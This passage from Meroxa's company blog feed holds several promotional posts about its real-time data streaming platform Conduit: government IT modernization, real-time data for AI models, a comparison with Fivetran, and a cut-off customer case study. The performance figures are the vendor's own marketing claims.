&lt;li&gt;&lt;strong&gt;Cross-Team Insights:&lt;/strong&gt; Collaboration across teams was critical to addressing challenges and ensuring impactful solutions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Inspirational Ideas:&lt;/strong&gt; The demo sparked new directions for future innovations, from platform features to user experience improvements.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Recognition:&lt;/strong&gt; Acknowledging the creativity and dedication of the team reinforced the value of collaboration and innovation.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;What’s Next?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Champagne Week is a springboard for ongoing improvement and growth. Here’s what’s ahead:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Developer Tools:&lt;/strong&gt; We’ll continue refining tools to enhance the developer experience and reduce friction.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Performance Optimization:&lt;/strong&gt; Ongoing work to ensure Conduit remains reliable and efficient, even at scale.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Community Engagement:&lt;/strong&gt; Expanding opportunities to connect with the Conduit community through new features and events.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;A Toast to Innovation&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_174156.png&quot; alt=&quot;dkeeton_174156.png&quot;&gt;
Champagne Week embodies the creativity, dedication, and collaboration of the Meroxa team. Thank you to everyone who contributed to making this week a success—and to our users, who inspire us to keep raising the bar.&lt;/p&gt;
&lt;p&gt;Stay tuned for more updates and insights as we build the future of real-time data movement. Cheers!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Government IT Modernization with Meroxa: Accelerate Your Digital Transformation]]></title><description><![CDATA[In this blog, discover how Meroxa empowers governments to overcome the challenges of IT modernization with real-time data integration, cost-effective solutions, and secure, scalable infrastructure. Learn how Meroxa helps transform aging systems into agile, efficient platforms that meet the growing demands of today’s tech-savvy constituents. Explore real-world success stories, actionable insights, and innovative strategies to deliver better services, reduce costs, and improve transparency—without sacrificing security or control. Whether you're managing federal programs, state services, or local initiatives, Meroxa enables you to reimagine government operations at the speed of innovation.  ]]></description><link>https://meroxa.com/blog/government-it-modernization-with-meroxa-accelerate-your-digital-transformation</link><guid isPermaLink="false">https://meroxa.com/blog/government-it-modernization-with-meroxa-accelerate-your-digital-transformation</guid><dc:creator><![CDATA[William Hill]]></dc:creator><pubDate>Thu, 05 Dec 2024 11:38:00 GMT</pubDate><content:encoded>&lt;p&gt;&lt;strong&gt;Empower Your Government to Work Smarter and Faster&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Constituents today expect government services to be as seamless and user-friendly as the digital experiences they enjoy in the private sector. But with legacy systems, siloed data, and increasing demands, many agencies face challenges in meeting those expectations.&lt;/p&gt;
&lt;p&gt;At Meroxa, we bridge the gap between traditional government systems and modern digital agility. With our &lt;strong&gt;real-time data integration and movement platform&lt;/strong&gt;, we enable governments to modernize IT infrastructure without sacrificing security, transparency, or cost-efficiency. Whether you’re transforming local services, scaling state-level programs, or overhauling federal systems, Meroxa equips you to work at the speed of innovation.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Our Government IT Solutions&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Real-Time Data, Real-Time Results&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Enable real-time insights and decision-making by &lt;strong&gt;reducing data latency by up to 60%&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;Deliver on-demand services with &lt;strong&gt;seamless data synchronization&lt;/strong&gt; across departments and platforms.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Modernization Without Overhauls&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Extend the value of legacy systems with &lt;strong&gt;modern integrations&lt;/strong&gt; that don’t require costly replacements.&lt;/li&gt;
&lt;li&gt;Simplify IT transformations with our &lt;strong&gt;low-code platform&lt;/strong&gt;, reducing operational complexity.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalability and Efficiency&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Dynamically scale your infrastructure to handle high-volume workloads like benefits processing, public safety initiatives, and more.&lt;/li&gt;
&lt;li&gt;Save up to &lt;strong&gt;30% in operational costs&lt;/strong&gt; by automating manual workflows and optimizing resource use.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Data Security and Transparency&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Protect sensitive constituent data with &lt;strong&gt;end-to-end encryption&lt;/strong&gt; and robust access controls.&lt;/li&gt;
&lt;li&gt;Maintain compliance with strict audit trails and data lineage features that provide visibility into every transaction.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;The Challenges of Government IT Modernization&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_IT_Modernization.png&quot; alt=&quot;dkeeton_17415_IT_Modernization.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Transforming government IT isn’t just about technology—it’s about navigating complex challenges:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Legacy Systems:&lt;/strong&gt; Many agencies still rely on outdated systems that weren’t designed to support modern demands.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Siloed Data:&lt;/strong&gt; Departments often operate in isolation, leading to inefficiencies and fragmented constituent experiences.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Budget Constraints:&lt;/strong&gt; Governments need solutions that balance cost, performance, and scalability.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Meroxa helps governments overcome these hurdles by enabling &lt;strong&gt;real-time data movement&lt;/strong&gt;, modern integrations, and flexible infrastructure upgrades—all without the need for costly, full-scale replacements.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;How Meroxa Powers Government IT Transformation&lt;/strong&gt;&lt;/h3&gt;
&lt;h3&gt;&lt;strong&gt;1. Real-Time Data Integration&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Governments generate and rely on massive amounts of data—but disconnected systems create bottlenecks. Meroxa unifies data flows, enabling real-time communication between legacy systems, new applications, and external platforms.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Features:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Seamlessly integrate databases, CRMs, and analytics tools across departments.&lt;/li&gt;
&lt;li&gt;Power faster decision-making with real-time insights into mission-critical operations.&lt;/li&gt;
&lt;li&gt;Ensure scalability with &lt;strong&gt;dynamic pipeline management&lt;/strong&gt; that adjusts to peak workloads.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; A state health department reduced benefits processing times by &lt;strong&gt;50%&lt;/strong&gt; by unifying data across welfare, healthcare, and child services systems.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;2. Cost-Effective Modernization&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Replacing aging systems outright isn’t always feasible. With Meroxa, governments can extend the functionality of legacy systems while embracing cutting-edge solutions.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Features:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Low-code platform:&lt;/strong&gt; Simplify complex integrations with intuitive, developer-friendly tools.&lt;/li&gt;
&lt;li&gt;Automate data workflows to eliminate manual errors and inefficiencies.&lt;/li&gt;
&lt;li&gt;Enable faster rollouts of digital services while staying within budget.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; A national child support system managing over $360 million annually saved &lt;strong&gt;20% in operational costs&lt;/strong&gt; by integrating existing databases with Meroxa’s platform.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;3. Better Constituent Services&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Modern constituents expect fast, personalized, and secure access to government services. Meroxa helps agencies deliver:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Features:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Real-time personalization for services like benefits processing, permit applications, and public inquiries.&lt;/li&gt;
&lt;li&gt;Streamlined interagency collaboration to reduce delays and improve outcomes.&lt;/li&gt;
&lt;li&gt;AI-powered insights to predict and address constituent needs proactively.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; In Israel, welfare application processing times were reduced from months to hours using Meroxa’s real-time data platform.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;4. Transparent and Secure Operations&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Governments handle sensitive data daily, making security and transparency paramount. Meroxa ensures:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Key Features:&lt;/strong&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;End-to-end encryption:&lt;/strong&gt; Protect data at every step of the pipeline.&lt;/li&gt;
&lt;li&gt;Detailed audit logs and data lineage tracking for compliance and governance.&lt;/li&gt;
&lt;li&gt;Secure integration with monitoring tools like Splunk and OpenTelemetry.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;strong&gt;Example:&lt;/strong&gt; A federal agency managing public safety programs maintained &lt;strong&gt;100% compliance&lt;/strong&gt; with strict data governance regulations by leveraging Meroxa’s security features.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_dept_of_defense_it.png&quot; alt=&quot;dkeeton_17415_dept_of_defense_it.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Reimagine Government IT with Meroxa&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Modernizing IT infrastructure is no longer optional—it’s essential to meet the needs of today’s constituents. With Meroxa, governments can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Deliver faster, more efficient services at scale.&lt;/li&gt;
&lt;li&gt;Achieve digital transformation without abandoning legacy investments.&lt;/li&gt;
&lt;li&gt;Securely manage and share data across systems, agencies, and platforms.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;How Can Meroxa Help You?&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;In the U.S.:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Transform federal, state, and local government services with real-time data integration.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Globally:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;From smart cities to social services, Meroxa empowers governments around the world to reimagine how they serve their citizens.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Contact Us:&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Ready to modernize your IT infrastructure? Speak to a Meroxa expert today and take the first step toward a more agile, efficient government.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Let’s Connect →&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Stale Data is Killing Your AI Models: Why Real Time Data is the Best Path Forward]]></title><description><![CDATA[In today’s fast-paced AI landscape, relying on outdated, static datasets can lead to inaccurate models, costly retraining cycles, and delayed time-to-market for AI features. Real-time data pipelines offer a game-changing solution, enabling AI systems to stay accurate, scalable, and cost-effective by continuously learning from current conditions. With benefits like a 40% reduction in model hallucinations, faster deployment, and lower infrastructure costs, real-time data is essential for building reliable applications such as fraud detection, recommendation engines, and Customer 360 profiles. Discover how Meroxa’s platform empowers organizations to implement real-time data pipelines and unlock the full potential of their AI initiatives. ]]></description><link>https://meroxa.com/blog/stale-data-is-killing-your-ai-models-why-real-time-data-is-the-best-path-forward</link><guid isPermaLink="false">https://meroxa.com/blog/stale-data-is-killing-your-ai-models-why-real-time-data-is-the-best-path-forward</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Mon, 25 Nov 2024 17:42:48 GMT</pubDate><content:encoded>&lt;p&gt;As we navigate the explosive growth of AI adoption across industries, one challenge remains persistently thorny: ensuring our AI models remain accurate, reliable, and cost-effective to maintain. At Meroxa, we&apos;ve observed a clear pattern emerge – organizations that leverage real-time data for their AI models consistently outperform those relying on static, historical datasets.&lt;/p&gt;
&lt;h2&gt;The Hidden Cost of Stale Data&lt;/h2&gt;
&lt;p&gt;Most organizations today train their AI models on historical data dumps, typically refreshed weekly or monthly. While this approach might have sufficed in the past, it&apos;s becoming increasingly inadequate in our fast-paced digital environment. Here&apos;s what we&apos;re seeing in the field:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Models trained on outdated data are more prone to hallucinations, especially in dynamic domains like finance, e-commerce, and social media&lt;/li&gt;
&lt;li&gt;Companies spend millions retraining models that have drifted from reality&lt;/li&gt;
&lt;li&gt;Time-to-market for AI features is hampered by lengthy data preparation and training cycles&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Real-Time Data: The Antidote to AI Hallucinations&lt;/h2&gt;
&lt;p&gt;When AI models have access to real-time data streams, they maintain a closer connection to reality. At Meroxa, we&apos;ve helped numerous organizations implement real-time data pipelines for their AI systems, and the results are compelling:&lt;/p&gt;
&lt;p&gt;Our financial services clients report a 40% reduction in model hallucinations after implementing real-time data feeds. The reason is simple – when models can continuously learn from current market conditions, customer behaviors, and emerging patterns, they&apos;re less likely to generate responses based on outdated assumptions.&lt;/p&gt;
&lt;h2&gt;The Economic Argument for Real-Time Data&lt;/h2&gt;
&lt;p&gt;The financial benefits of real-time data integration extend beyond improved accuracy. We&apos;re seeing organizations achieve:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Reduced Training Costs: Instead of massive, periodic retraining sessions, models can be fine-tuned incrementally with fresh data, requiring significantly less computational resources.&lt;/li&gt;
&lt;li&gt;Faster Time-to-Market: Real-time data pipelines eliminate the need for time-consuming ETL processes and data preparation, allowing teams to deploy and iterate on models more rapidly.&lt;/li&gt;
&lt;li&gt;Lower Infrastructure Costs: By processing data incrementally rather than in large batches, organizations can maintain smaller, more efficient infrastructure footprints.&lt;/li&gt;
&lt;/ol&gt;
&lt;h2&gt;From Theory to Practice: Implementing Real-Time Data Pipelines&lt;/h2&gt;
&lt;p&gt;The benefits of real-time data are clear, but implementation has traditionally been a significant hurdle. This is where modern data infrastructure platforms come into play. At Meroxa, we&apos;ve built our platform specifically to address these challenges, offering:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Seamless integration with existing data sources that support the vector datatype&lt;/li&gt;
&lt;li&gt;Built-in stream processing to automate data preparation&lt;/li&gt;
&lt;li&gt;Automatic scaling to handle varying data volumes&lt;/li&gt;
&lt;li&gt;Enterprise-grade security and compliance features&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;The Future is Real-Time&lt;/h2&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_real_time_data_v_6.1_955717ea-d3c0-4be8-bc11-14aecd448a56_3.png&quot; alt=&quot;dkeeton_17415_real_time_data_v_6.1_955717ea-d3c0-4be8-bc11-14aecd448a56_3.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;As AI continues to evolve and become more deeply embedded in business operations, the importance of real-time data will only grow. Organizations that invest in robust real-time data infrastructure today will be better positioned to:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Deploy more accurate and reliable AI models&lt;/li&gt;
&lt;li&gt;Respond faster to changing market conditions&lt;/li&gt;
&lt;li&gt;Reduce their overall AI infrastructure costs&lt;/li&gt;
&lt;li&gt;Stay ahead of competitors in AI-driven innovation&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Getting Started&lt;/h2&gt;
&lt;p&gt;The shift to real-time data doesn&apos;t have to be overwhelming. Start by identifying one critical AI model in your organization that would benefit from fresher data. Consider the current refresh rate, the cost of retraining, and the impact of model drift on your business outcomes.&lt;/p&gt;
&lt;p&gt;At Meroxa, we&apos;ve helped organizations across industries make this transition successfully. Whether you&apos;re just starting your AI journey or looking to optimize existing models, we have the expertise and technology to help you implement real-time data pipelines that drive better AI outcomes. Remember, in the world of AI, your models are only as good as the data they learn from. Make sure that data is as fresh and relevant as possible.&lt;/p&gt;
&lt;p&gt;*Want to learn more about implementing real-time data pipelines for your AI infrastructure? &lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Sign up today!&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Meroxa’s Conduit Platform: Real-Time Data Movement at Scale, with Proven Performance]]></title><description><![CDATA[Our latest article highlights why Meroxa’s Conduit Platform is the game-changing solution for real-time data streaming, offering up to 90% faster data delivery and 80% lower latency compared to batch-based tools like Fivetran.]]></description><link>https://meroxa.com/blog/meroxas-conduit-platform-real-time-data-movement-at-scale-with-proven-performance</link><guid isPermaLink="false">https://meroxa.com/blog/meroxas-conduit-platform-real-time-data-movement-at-scale-with-proven-performance</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Wed, 20 Nov 2024 05:42:26 GMT</pubDate><content:encoded>&lt;p&gt;In the state of big data real-time movement isn&apos;t just a luxury—it&apos;s a necessity. Tools like Fivetran, while useful for batch processing, can’t deliver the performance required for real-time operations at scale. Meroxa’s Conduit Platform stands apart, providing &lt;strong&gt;real-time data streaming&lt;/strong&gt; with unmatched scalability, all while empowering businesses to own and manage their data lakes and warehouses.&lt;/p&gt;
&lt;p&gt;But how does Meroxa’s performance stack up? Let’s explore the numbers.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Real-Time vs. Batch: The Meroxa Advantage&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Real-time processing isn’t just faster—it’s transformative. Meroxa’s Conduit Platform is optimized to deliver &lt;strong&gt;up to 90% faster data delivery&lt;/strong&gt; compared to batch-based systems like Fivetran. This means businesses can act on insights almost instantaneously rather than waiting minutes or hours for batch updates.&lt;/p&gt;
&lt;h3&gt;Performance Highlights:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;99.9% data delivery reliability&lt;/strong&gt; across real-time pipelines, even during peak loads.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;80% reduction in data latency&lt;/strong&gt;, enabling near-instantaneous responses to critical events.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;4x throughput capacity&lt;/strong&gt; compared to traditional ETL tools, supporting millions of events per second.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Bring Your Own Data Lake or Warehouse (BYO)&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/dkeeton_17415_create_an_illustration_data_warehouse_integrate_b957fc85-fc0c-4825-943b-d16d5b77ff69_1.png&quot; alt=&quot;dkeeton_17415_create_an_illustration_data_warehouse_integrate_b957fc85-fc0c-4825-943b-d16d5b77ff69_1.png&quot;&gt;&lt;/p&gt;
&lt;p&gt;Unlike Fivetran’s managed approach, which often locks businesses into proprietary systems, Meroxa’s Conduit Platform embraces flexibility. With Meroxa, you can leverage your existing data lake or warehouse infrastructure—whether that’s AWS S3, Snowflake, BigQuery, or others—while enjoying the performance benefits of real-time streaming.&lt;/p&gt;
&lt;h3&gt;Benefits of the BYO Approach:&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Cost Savings&lt;/strong&gt;: Businesses report &lt;strong&gt;up to 60% lower infrastructure costs&lt;/strong&gt; by eliminating the need for redundant storage and managed services.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Full Control&lt;/strong&gt;: Maintain ownership of your data, ensuring compliance, security, and flexibility.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Seamless Integration&lt;/strong&gt;: Build pipelines tailored to your unique architecture, avoiding the limitations of one-size-fits-all solutions.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Scalable Performance&lt;/strong&gt;: Stream data directly to your data lake or warehouse, ensuring it’s ready for analysis with &lt;strong&gt;50% faster ingestion times&lt;/strong&gt; compared to batch systems.&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Scalability and Flexibility: Built for Enterprise Loads&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform is built to handle the most demanding use cases. With &lt;strong&gt;elastic scaling&lt;/strong&gt;, the platform easily supports high-throughput environments without sacrificing performance.&lt;/p&gt;
&lt;h3&gt;Key Metrics:&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Handles up to 10 million events per second&lt;/strong&gt;, ensuring seamless scalability for even the largest organizations.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;50% faster pipeline deployment&lt;/strong&gt;, reducing time-to-market for data integration projects.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Zero downtime&lt;/strong&gt; during scaling events, guaranteeing uninterrupted operations.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Real-World Use Cases with Proven Results&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;Real-Time Fraud Detection&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A fintech company leveraged Meroxa to stream transactional data in real time to its data lake for fraud detection. The result? &lt;strong&gt;90% faster anomaly detection&lt;/strong&gt;, reducing fraud losses by millions annually.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Dynamic Inventory Management&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;An e-commerce platform used Meroxa’s Conduit Platform to synchronize inventory data across warehouses in real time. This enabled &lt;strong&gt;95% accuracy in stock levels&lt;/strong&gt;, minimizing missed sales and overstocking.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Personalized Customer Engagement&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;A streaming service processed user behavior data with Conduit, achieving &lt;strong&gt;85% faster recommendation updates&lt;/strong&gt;, leading to a &lt;strong&gt;30% increase in customer engagement&lt;/strong&gt; and retention rates.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Meroxa vs. Fivetran: A Performance Comparison&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/compet_table_fivetran.png&quot; alt=&quot;compet_table_fivetran.png.png&quot;&gt;&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Unlock Real-Time Data Movement at Scale&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa’s Conduit Platform offers unmatched real-time data movement performance, giving you the speed, flexibility, and scalability to stay ahead of the competition. Whether you’re optimizing fraud detection, inventory management, or customer engagement, Conduit delivers the power you need to make data-driven decisions faster and more efficiently.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Experience performance at scale and control your data destiny—choose Meroxa.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href=&quot;https://meroxa.com/contact/sales/&quot;&gt;Sign up today!&lt;/a&gt;&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Case Study: Streamlining Data Flow for The Hotels Network with Meroxa]]></title><description><![CDATA[The Hotels Network (THN) partnered with Meroxa to streamline data flow between their sales and support teams, overcoming siloed data and complex architecture challenges. Using Meroxa’s Conduit Platform, THN achieved a unified, real-time pipeline from Salesforce to Redpanda, reducing operational costs by 30% and enhancing customer support capabilities. The solution’s scalability ensures THN can continue to grow and optimize operations seamlessly.]]></description><link>https://meroxa.com/blog/case-study-streamlining-data-flow-for-the-hotels-network-with-meroxa</link><guid isPermaLink="false">https://meroxa.com/blog/case-study-streamlining-data-flow-for-the-hotels-network-with-meroxa</guid><dc:creator><![CDATA[Dion Keeton]]></dc:creator><pubDate>Wed, 13 Nov 2024 01:15:54 GMT</pubDate><content:encoded>&lt;h3&gt;&lt;strong&gt;Client Overview&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Hotels Network (THN) is a leading technology company in the hospitality sector, offering innovative tools to enhance guest experiences and optimize revenue. The Hotels Network (THN) approached us to help address a critical challenge—managing the data silo between their sales and support teams. This disconnect was hindering their ability to operate efficiently and gain a unified view of customer interactions. By streamlining their data flows and integrating their systems, we were able to bridge the gap between sales and support, ultimately increasing THN&apos;s operational efficiency and enhancing its ability to deliver a seamless customer experience.&lt;/p&gt;
&lt;p&gt;In the face of  rising costs and operational complexity; THN needed a more streamlined solution that would support and scale their daily volume efficiently without compromising security.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Challenges&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;The Hotels Network (THN) faced significant challenges due to fragmented insights and disconnected data streams between their sales and support teams. This &lt;strong&gt;siloed data&lt;/strong&gt; made it difficult to achieve a unified view of customer interactions and hindered efficient communication. Their &lt;strong&gt;complex architecture&lt;/strong&gt;, built on multiple data streaming services, added layers of cost and complexity, making it hard to manage and scale effectively. On top of this, the organization needed to handle &lt;strong&gt;high volumes&lt;/strong&gt; of data, processing around 100 daily events, each with numerous data elements, which created operational bottlenecks and inefficiencies. These challenges underscored the need for a streamlined, integrated approach to data management that could support both high throughput and seamless cross-functional insights.&lt;/p&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Solution Overview&lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;Meroxa provided THN with a comprehensive data integration solution using their&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Conduit Platform&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;to streamline the flow of data between Salesforce and Redpanda. By creating a unified pipeline, Meroxa simplified the architecture, reducing operational costs and providing real-time updates.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/meroxa_connector.png&quot; alt=&quot;meroxa_connector.png.png&quot;&gt;&lt;/p&gt;
&lt;h3&gt;&lt;strong&gt;Key Components of the Solution&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Salesforce Integration&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Meroxa set up a Salesforce trigger and platform event configuration to publish key events in real-time.&lt;/li&gt;
&lt;li&gt;This ensured that customer interactions and property data were kept up-to-date without manual interventions, improving the overall flow of data from the sales to the support teams.&lt;/li&gt;
&lt;li&gt;We&apos;ve configured the Salesforce platform event to publish different event types, and Meroxa was able to handle them as expected using multiple Topics&lt;/li&gt;
&lt;li&gt;Meroxa was able to adapt the JSON format to be published in Redpanda to the specifications of the customer&apos;s team. This helped us to keep a consistent JSON notation with other integrated systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Redpanda Cluster Setup&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;Meroxa configured a Redpanda cluster, managing topics with secure Access Control Lists (ACL) and authentication mechanisms to protect data and ensure seamless, secure connections between the systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Conduit Platform&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;The entire pipeline was managed using Meroxa’s platform, which consumed Salesforce events and streamed them into Redpanda. Secrets management for secure credentials and connection monitoring was handled through Meroxa, providing a centralized and reliable data flow infrastructure.&lt;/li&gt;
&lt;li&gt;The solution was designed to support THN’s current data volume and had the flexibility to scale as their business grows.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;&lt;strong&gt;Implementation Timeline&lt;/strong&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Phase 1&lt;/strong&gt;: Initial consultation and requirements gathering.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Phase 2&lt;/strong&gt;: Salesforce and Redpanda integration setup (1 week).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Phase 3&lt;/strong&gt;: Testing and troubleshooting (2 weeks).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Phase 4&lt;/strong&gt;: Full deployment and production (within 1 month from project start).&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;p&gt;&lt;em&gt;&lt;strong&gt;&quot;The Meroxa team worked with us to design, build &amp;#x26; deploy an efficient low-code solution to connect our Salesforce org with our internal backend system via the Redpanda streaming platform.&quot;&lt;/strong&gt;&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;David Sanchez Carmona&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Senior GTM Systems Manager&lt;/em&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;strong&gt;Results and Benefits&lt;/strong&gt;&lt;/h3&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Improved Data Flow&lt;/strong&gt;
&lt;ul&gt;
&lt;li&gt;With the consolidated data pipeline, THN eliminated siloed data between Salesforce and Redpanda, achieving a unified, seamless data flow.&lt;/li&gt;
